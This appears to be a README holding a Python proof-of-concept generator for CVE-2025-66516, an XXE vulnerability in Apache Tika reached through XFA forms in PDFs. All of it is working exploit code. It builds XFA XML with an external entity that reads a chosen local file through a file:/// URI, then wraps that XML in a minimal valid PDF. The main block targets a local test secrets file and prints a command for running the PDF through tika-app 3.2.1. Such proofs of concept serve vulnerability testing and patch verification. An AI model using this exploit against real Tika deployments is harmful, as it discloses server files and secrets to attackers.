README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-66516 POC Generator
Apache Tika XXE via XFA in PDF
DISCLAIMER: This POC code is for educational purposes only. Unauthorized use may violate laws.
"""
def build_file_read_xfa_xml(target_path):
    """Return XFA (XDP) XML text that references ``target_path`` as an external entity.

    The DOCTYPE declares an entity ``xxe`` whose SYSTEM identifier is a
    ``file:///`` URI built from ``target_path``; the entity is referenced
    inside the ``<field>`` element of the XFA datasets section.

    Args:
        target_path: Filesystem path to reference. Backslashes are converted
            to forward slashes and leading slashes are collapsed, so both
            ``/etc/hosts`` and ``C:\\dir\\file`` yield a three-slash URI.

    Returns:
        The XML document as a ``str``, one element per line, ending with a
        trailing newline.
    """
    # file:// URIs always use forward slashes, whatever the host OS uses.
    posix_style = target_path.replace("\\", "/")
    # Strip leading slashes so the result has exactly three after "file:".
    file_uri = "file:///" + posix_style.lstrip("/")

    xml_lines = (
        "<!DOCTYPE xfa [",
        f'<!ENTITY xxe SYSTEM "{file_uri}">',
        "]>",
        '<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">',
        "<xdp:template>",
        '<template xmlns="http://www.xfa.org/schema/xfa-template/2.8/">',
        '<subform name="form1"><field name="field"/></subform>',
        "</template>",
        "</xdp:template>",
        "<xdp:datasets>",
        '<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">',
        "<xfa:data><root><field>&xxe;</field></root></xfa:data>",
        "</xfa:datasets>",
        "</xdp:datasets>",
        "</xdp:xdp>",
        "",  # produces the trailing newline after the closing tag
    )
    return "\n".join(xml_lines)
def build_pdf(xfa_xml, out_path):
    """Write a minimal PDF 1.7 file whose AcroForm /XFA entry carries ``xfa_xml``.

    The file contains five indirect objects: the catalog (1), the page tree
    (2), one 612x792-point page (3), the AcroForm dictionary (4) and the XFA
    stream (5). Object 5 is physically written before object 4; the
    cross-reference table is still emitted in object-number order, so each
    entry holds the byte offset of the object it describes.

    Args:
        xfa_xml: XFA XML text; it is UTF-8 encoded and stored as the stream
            body of object 5.
        out_path: Destination path, opened in binary write mode (an existing
            file is overwritten).

    Raises:
        OSError: If ``out_path`` cannot be opened or written.
    """
    # PDF header: version line plus a comment line of high-bit bytes that
    # marks the file as binary.
    pdf = bytearray(b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n")
    # Byte offset of every object, keyed by object number, so the xref table
    # does not depend on the order in which objects are written.
    offsets = {}

    def add_obj(num, body):
        """Append indirect object ``num`` with raw ``body`` and record its offset."""
        offsets[num] = len(pdf)
        pdf.extend(f"{num} 0 obj\n".encode("ascii"))
        pdf.extend(body)
        pdf.extend(b"\nendobj\n")

    # For the standard PDF structure and an explanation of each object, see:
    # https://pdfa.org/resource/pdf-specification-archive/
    # Object 1: document catalog - root of the PDF, references Pages and AcroForm.
    add_obj(1, b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>")
    # Object 2: page tree with a single page.
    add_obj(2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>")
    # Object 3: the page itself (612x792 points = 8.5x11 inches).
    add_obj(3, b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << >> >>")

    # Object 5: stream holding the XFA XML. /Length counts only the payload
    # bytes, not the newline that precedes "endstream".
    x_bytes = xfa_xml.encode("utf-8")
    x_stream = (
        f"<< /Length {len(x_bytes)} >>\nstream\n".encode("ascii")
        + x_bytes
        + b"\nendstream"
    )
    add_obj(5, x_stream)
    # Object 4: AcroForm dictionary whose /XFA entry points at object 5.
    add_obj(4, b"<< /NeedAppearances true /Fields [] /XFA 5 0 R >>")

    # Cross-reference table: one subsection covering objects 0..size-1.
    xref_start = len(pdf)
    size = max(offsets) + 1
    pdf.extend(b"xref\n")
    pdf.extend(f"0 {size}\n".encode("ascii"))
    # Entry 0 is always the head of the free list.
    pdf.extend(b"0000000000 65535 f \n")
    # Entries must appear in object-number order; iterating by number (not by
    # write order) keeps objects 4 and 5 from having their offsets swapped.
    for num in range(1, size):
        pdf.extend(f"{offsets[num]:010d} 00000 n \n".encode("ascii"))

    # Trailer dictionary, pointer to the xref table, and end-of-file marker.
    pdf.extend(
        f"trailer\n<< /Size {size} /Root 1 0 R >>\nstartxref\n{xref_start}\n%%EOF\n".encode("ascii")
    )

    with open(out_path, "wb") as f:
        f.write(bytes(pdf))
if __name__ == "__main__":
    # Script entry point: build the sample document for a fixed local test
    # file and print how to run it through a local Tika test install.
    poc_name = "cve_2025_66516_poc.pdf"
    secret_path = "/home/siddhartha/apache_tika_poc/fake-secrets.txt"

    build_pdf(build_file_read_xfa_xml(secret_path), poc_name)

    status_lines = (
        "[+] Generated " + poc_name,
        "[+] Target: " + secret_path,
        "[+] Test: java -jar tika-app-3.2.1.jar -t " + poc_name,
    )
    for status in status_lines:
        print(status)